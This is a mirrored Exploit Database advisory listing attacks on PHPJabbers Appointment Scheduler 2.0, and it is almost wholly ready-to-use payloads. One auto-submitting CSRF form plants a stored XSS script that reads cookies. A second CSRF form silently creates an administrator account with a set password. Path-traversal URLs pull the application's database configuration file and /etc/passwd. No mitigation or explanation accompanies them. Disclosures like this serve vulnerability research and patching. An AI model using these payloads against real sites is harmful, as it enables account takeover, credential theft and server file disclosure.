PHPJabbers Appointment Scheduler 2.0 – Multiple Vulnerabilities

• Exploit Database
• 130 阅读

• 作者： HackXBack
  日期： 2014-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30911/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

  Appointment Scheduler V2.0 - Multiple Vulnerabilities =========================================================================   #################################################################### .:. Author : HackXBack .:. Contact: h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/appointment-scheduler/ ####################################################################   ===[ Exploit ]===   [1] Cross Site Scripting =========================   # CSRF with XSS Exploit:     <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=pjAdminServices&action=pjActionCreate"> <input type="hidden" name="service_create" value="1"/> <input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/> <input type="hidden" name="i18n[1][description]" value="Iphobos Blog"/> <input type="hidden" name="price" value="100"/> <input type="hidden" name="length" value="1"/> <input type="hidden" name="before" value="1"/> <input type="hidden" name="after" value="1"/> <input type="hidden" name="total" value="3"/> <input type="hidden" name="is_active" value="1"/> </form> </body> </html>     [2] Cross Site Request Forgery ===============================   [Add Admin]   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=pjAdminUsers&action=pjActionCreate"> <input type="hidden" name="user_create" value="1"/> <input type="hidden" name="role_id" value="1"/> <input type="hidden" name="email" value="Email@hotmail.com"/> <input type="hidden" name="password" value="123456"/> <input type="hidden" name="name" value="Iphobos"/> <input type="hidden" name="status" value="T"/> </form> </body> </html   [3] Local File disclure ========================   http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../app/config/db.inc.php http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd     ####################################################################